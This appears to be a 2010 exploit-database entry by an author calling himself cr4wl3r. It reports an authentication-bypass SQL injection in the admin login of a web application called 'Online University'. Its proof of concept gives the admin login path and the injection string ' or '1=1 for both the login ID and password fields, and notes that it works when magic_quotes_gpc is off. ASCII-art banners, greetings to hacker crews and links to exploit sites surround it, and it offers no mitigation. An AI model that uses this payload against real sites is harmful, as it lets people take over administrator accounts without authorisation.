[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Online University (Auth Bypass) SQL Injection Vulnerability
# Published : 2010-05-21
# Author : cr4wl3r
# Previous Title : JV2 Folder Gallery <==3.1 (gallery.php ) Remote File Inclusion Vulnerability
# Next Title : Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' __ /'__` / __ /'__` 0
0 /_, ___ /_/_ ___ ,_/ / _ ___ 1
1 /_/ /' _ ` / /_/__<_ /'___ / /`'__ 0
0 / / / / __/ _ _ / 1
1 _ _ __ ____/ ____\ __\ ____/ _ 0
0 /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ 1
1 ____/ >> Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ###################################### 1
0 I'm cr4wl3r member from Inj3ct0r Team 1
1 ###################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
#'#/
(-.-)
--------------------oOO---(_)---OOo-----------------------------
| Online University (Auth Bypass) SQL Injection Vulnerability |
| (works only with magic_quotes_gpc = off) |
----------------------------------------------------------------
[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Homepage: http://h4ckb0x.org/
[!] Script: http://hostnomi.net/detail.php?spid=30
[!] Dork: no dork for script kiddies :p~
[!] Remote: yes
[x] PoC:
http://[site]/uniweb/siteadmin/login.asp
Login ID : ' or '1=1
Password : ' or '1=1
[~] Greetz: r0073r, str0ke, opt!x hacker, xoron, Ricardo Almeida, cyberlog, irvian, zreg, k1n9k0ng, letjen, team_elite, wiro sableng, samuel MC, EA ngel, and all my friend
[~] Special to: Valentin Hobel (Happy Birthday brotha) ;)
[~] Visit: inj3ct0r.com, exploit-db.com for more exploits and to update the new exploits
[~] Regards: cr4wl3r